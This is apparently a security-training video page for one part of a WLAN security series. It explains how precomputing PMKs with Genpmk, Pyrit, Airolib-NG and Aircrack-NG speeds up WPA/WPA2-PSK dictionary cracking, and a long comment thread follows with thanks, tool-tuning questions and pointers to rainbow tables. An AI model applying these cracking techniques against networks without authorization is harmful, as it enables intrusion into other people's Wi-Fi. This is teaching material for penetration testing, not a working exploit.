Description: Welcome to Part 24 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we will look at tools and techniques which can be used to speed up WPA/WPA2 PSK based cracking.
The basic idea is to first understand the Dictionary attack in more depth. The CPU and time consuming calculation is that of the PBKDF2 which converts a Passphrase into the Pre-Shared Key, which is also the Pairwise Master Key (PMK) in this case. Apart from the Passphrase, the other variable input to this function is SSID of the network. To speed up cracking, we need to pre-compute all the PMKs using probable SSIDs and Passphrase combinations. Now all we will have to do is use variables in the 4 way handshake (ANonce, SNonce, Authenticator MAC, Supplicant MAC) along with this PMK to generate a PTK and verify it by using one or more MICs from the handshake. If the MIC matches, then our assumed Passphrase is correct! and the key is cracked!
In course of this video, we will touch upon the following tools: Genpmk, Cowpatty, Pyrit, Airolib-NG, Aircrack-NG. I don't have a monster muti-CPU demon at my disposal, so we will use our slow, 1 GB RAM VM for the demos :)
Look forward to your comments and suggestions!
Tags: wpa-psk , wireless , wifi , security , megaprimer , pbkdf , ptk , pmk , anonce , snonce ,
Awesome..Thanks again Vivek
Perfect ! go to next videos .....
awesome. i'll have to watch it later. kinda busy, but thanks dude ! :D
Thanks again Vivek, awesome video.
Nice video!
I thought we were going to get an encore at the end of this one :-)
I'd just like to say a sincere and heart felt thank you to Vivek. Here is a man who appears to be in the process of setting up his own business, but still finds space in his schedule to give over lots of his time to provide free, high quality videos and training on interesting and relevant subjects.
His range of videos is unique and he takes us all on a voyage of discovery with a cheerful smile - whilst effortlessly getting the key points across and installing knowledge.
Over many months I've watched videos from Vivek and other Security Tube contributors and I'm astounded at what I've learned - even an old guy like me.
Naturally many of us have learned the tricks of the trade in attacking/testing Wireless networks here - but more importantly we have learned steps to take to SECURE wireless without even realising it. Many of us have become fluent in using tools like Wireshark, the Aircrack suite and the like. We have seen Python and many of us are now dabbling with it. We've learned many tricks and gained new skills all because of this man's selflessness and spirit of giving.
Vivek Ramachandran. Your work is inspirational, your skills are exemplary. You are both hero and genius to many of us, and remain kind, charitable and keep your feet on the ground in your dealings with us all. I can only imagine your parents and family are very proud of you.
'Thank you' never really seems enough for what you have done for so many people - but Vivek, Thank You.
In total agreement with Blackmarketeer. I couldn't have said it better myself
@Blackmarketeer very nice said :) I coudnt agree more :)
@everybody I would suggest to use questions.securitytube.net for discussions about videos, coding etc so we get them started again. Think of as something like a forum where you can communicate and work together on challenges, problems etc.
@Blackmartketeer: I could not say it in a better way!
@Vivek: awesome as every time. This was the last video of the megaprimer? or will there be a next video?
@Blackmarketeer: very eloquent. I have nothing but admiration for Vivek's knowledge, enthusiasm and generosity.
@Vivek: As I watched this video, something popped into my head! I know you dealt with the concept of a fake AP using airbase-ng and the honeypot can be open or configured with WEP. As far as I know, it won't work with WPA/WPA2 so I wonder if there are any tricks up your sleeve to create a WPA/WPA2 fake AP?
Another great video Vivek the videos just keep getting better.
@Blackmarkteer... I could not have said it any better than the way you did very admiral
--Chard
Does anyone know how to kill X-Server in BT5 running in VirtualBox beacause i was going to do a video of my machine running genpmk as vivek suggested in this vid. Im trying to install the NVIDIA Drivers for my 260 GTX
Thanks
--Chard
@Vivek i think you are not a normal human being you are a MIRACLE that happened to us big big big greeting and thank you
@everyone i have 40GB of rainbow tables....i will give you one direct link for them ASAP....Thanks
@Blackmarkteer, I just couldn't agree more.
vivek , i have just started to watch your videos . man u r great . i had been looking for such type of videos since a long time and now i am on the right place . thank u very much.
One word: Awesome!
BTW, are you going to do a video on your solution to the challenge?
@WCNA; yes he will in this week, he said so in another post.
Vivek You mentioned in video 16 about how you can tell whether a probe request was WEP or WPA, and that this would be covered in a later video. I have tried to use WiFishfinder, but have so far failed. Anybody know of a way to distinguish between WEP and WPA probes
Vivek!, as always a wonderful video!. By the way I just pre-ordered your book: Backtrack 5 Wireless Penetration Testing Beginner's Guide, and here's the link for everyone to go and do the same! It's the least we can do to support Vivek and his efforts! So everyone hit the link and pre-order the book!!!!
http://www.packtpub.com/backtrack-5-wireless-penetration-testing-beginners-guide/book?monthly=true#in_detail
Chard: just log out. :) enyway you cant use cuda tools in a virtual machine as it dosnt have support for your internal video card, as far as i know.
Thanks esojzuir ......I just ordered it. It's the least I can do considering all the free training Vivek has given us.
@mgsyd, soheil.r, allisonmagicelite, m0ei, Casey, Wavelength, Netinfinity, 3IL060, Chard, ahmadqdemat, jib, i7-Cud4 Thanks guys :) Your appreciation is always appreciated and keeps me going!
@Blackmarketeer Thanks my friend. Really appreciate you taking the time to write this :) I hope I can always live up to all your expectations and continue to do this forever! As a reply to this I will post a PPT on why I started SecurityTube, the vision and what I am planning to do with it :) Stay tuned.
@esojzuir Thanks for letting me know this was out (yes! I did not know) The publisher had said the pre-orders would be out soon but I did not know if was actually online :)
@esojzuir, WCNA Thanks for pre-ordering guys! To be honest, I not not expect anything in return for these videos. I will explain the reason I do what I do in a video soon :)
Challenge Solution posted (theory): http://www.securitytube.net/video/1919
@Ignatius Your questions will be answered in the next video! :)
Next video in the series has been posted: http://www.securitytube.net/video/1920 ! This deals with how to find which security setting the client has in its profile and how to exploit even WPA/WPA2 profiles.
@Ignatius this one is for you :)
like your videos ,Vivek.. :))
@esojzuir: thanks for the link - count me in to get one pre-ordered.
@Vivek: it seems that our minds are in sync! I've been researching TKIP and CCMP further and know that you're planning to cover these topics too. You estimated 22 videos in the series and we're already well past that. Maybe we should all have a guess about how moany there will be? There are so many interesting elements to this fascinating topic.
Drat - *many* not *moany*!
If only there was an edit function! I know that you're planning to resurrect (and maybe code?) a formal forum in due course.
Any suggestions on how to speed up airolib-ng, at the start it seems to be processing around 2000 or so passwords a second from the list file but once it gets up to around 100million processed it seems to slow down a ton and it is a 10GB list but still it should slow that much on 8GB of ram on a i7
Here is a brief video I made that shows how to use CUDA to speed up PMK generation.
It seems that a nVidia 295GTX is 7 times better than I7 920 CPU.
http://www.youtube.com/watch?v=Nbu011NYa_c
hello everyone, big thanks to vivek who is doing Incredible job on this site, am amazed! and am very impressed with community on this site which very hard to find on the net!! it looks like everyone working togethter to hit the target :-) and i thank you so much for sharing the knowledge,
i have only one question, can we use the same precomputed pmks dics file against nother AP wich has dif essid ? if yes how can it be done ? thanking you in advance.
Really, this site is great. I think vivek is an outstanding man. He wants to share his knowledge for free. For a long time i keep looking for tutorial like this,awesome,great. I keep waiting another series.
Someone, possibly the shmoo group have created a rainbow table for the top 1000 SSID's and a large list of password. It can be torrented online or ordered as DVD's.
Renderlab sorry.
http://www.renderlab.net/projects/WPA-tables/
I should have waited until the end :)
Sir i dont know if i should post this question write now but i was not able to get an association of wpa2 psk with cipher ccmp .... i dont know why there are no epol packets...can anyone tell me why this is happening ..no epol packets
First of all, I'd like to thank Vivek for these videos.
After that, if you permit, i have a question ! Is it possible to found a key as: "#g¤¤d m¤rn!ng €v€r¥b¤d¥#" ?
Sorry for my writng because i don't speak English very well !
Thank you very much ! :)
hi sir i wanna call you "master" its my honor , i have watched till this topic but i am so confused how can i produce a big dictionary to supply brute force method to crack wpa2- psk , the pass phrase can be anything i know you mentioned most of the time is easy but people almost used to mixed words, numbers and i don't know how to supply such a dictionary or pass phrase list i surfed on the web anyway i didn't find useful link or information. please help me to understand in advanced .
thank you so much